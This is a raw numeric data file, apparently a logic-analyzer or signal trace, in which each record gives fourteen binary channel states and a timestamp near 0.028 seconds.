1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101068e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101076e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8101120e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101144e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101152e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101172e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101196e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101292e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101344e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101444e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101448e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8101492e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101520e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8101524e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101528e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101568e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101668e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101676e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8101720e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101744e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101752e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8101796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101824e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8101844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101868e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8101892e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101920e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8101944e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8101972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8101976e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102092e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102100e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8102144e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102172e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8102176e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102180e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102220e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102268e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102344e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102348e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8102372e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102396e-02 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.8102400e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102404e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102492e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102516e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102544e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102596e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102668e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102676e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8102720e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102744e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102752e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8102892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8102916e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102924e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8102972e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8102996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103004e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103068e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8103076e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8103092e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8103116e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8103144e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8103168e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.8103196e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.8103220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103228e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103292e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103344e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103368e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103492e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103516e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103544e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103568e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103596e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103644e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103692e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103716e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103744e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103768e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103892e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103916e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103944e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8103968e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8103996e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8104020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8104044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8104068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8104092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.8104116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.8104144e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8228348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.8228540e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8228564e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,2.8228584e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8228608e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8228896e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8228924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8228948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8228972e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.8228976e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.8228996e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.8229020e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.8229044e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.8229072e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.8229096e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.8229124e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,1,2.8229128e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.8229132e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.8229172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229180e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229244e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229252e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8229268e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229296e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8229324e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229348e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229356e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229496e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229500e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8229548e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229580e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229620e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229624e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8229668e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8229692e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229700e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229720e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229744e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229868e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229892e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229920e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229944e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8229972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8229996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230068e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230092e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8230100e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8230120e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8230144e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8230172e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8230196e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8230220e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8230244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230252e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230296e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230320e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230344e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230372e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230420e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230472e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230496e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230548e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230572e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230620e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230672e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230748e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8230776e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8230820e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8230864e-02 0,1,1,0,0,1,0,0,0,0,0,0,1,0,2.8230896e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8230944e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8230968e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231024e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231048e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231068e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231092e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231100e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8231140e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231160e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8231168e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231180e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231204e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231212e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8231252e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231272e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231284e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231332e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231352e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231432e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231476e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231484e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8231524e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231544e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231556e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231568e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231588e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231612e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231636e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231644e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8231660e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231680e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8231688e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231692e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231812e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231836e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231860e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231884e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231904e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231924e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231932e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8231948e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8231972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8231980e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8231996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232016e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232040e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232060e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232084e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232112e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232136e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232164e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232188e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232212e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232236e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232260e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232284e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232312e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232336e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232364e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8232412e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232436e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8232460e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232484e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232492e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232512e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232536e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232564e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232588e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232612e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232636e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232644e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8232688e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232712e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8232716e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232720e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232740e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232764e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232788e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232812e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232836e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232860e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8232884e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232912e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232916e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8232964e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8232988e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8232996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233012e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233036e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233060e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233084e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233112e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233136e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233164e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233188e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233212e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233236e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233260e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233284e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233292e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8233340e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233364e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8233368e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233372e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233388e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233412e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233436e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233464e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233492e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,2.8233516e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233520e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8233564e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233588e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8233616e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233644e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8233648e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233652e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233668e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233692e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233716e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233740e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233764e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233792e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233796e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8233844e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233868e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233876e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8233892e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8233916e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233920e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8233968e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8233992e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8233996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234000e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234068e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234116e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234144e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234148e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8234172e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234196e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,2.8234200e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234204e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234272e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234292e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234348e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234444e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234452e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8234472e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234496e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8234524e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234548e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8234572e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234648e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234672e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234696e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234724e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8234772e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234796e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.8234820e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.8234844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234852e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234872e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234896e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.8234924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.8234948e-02 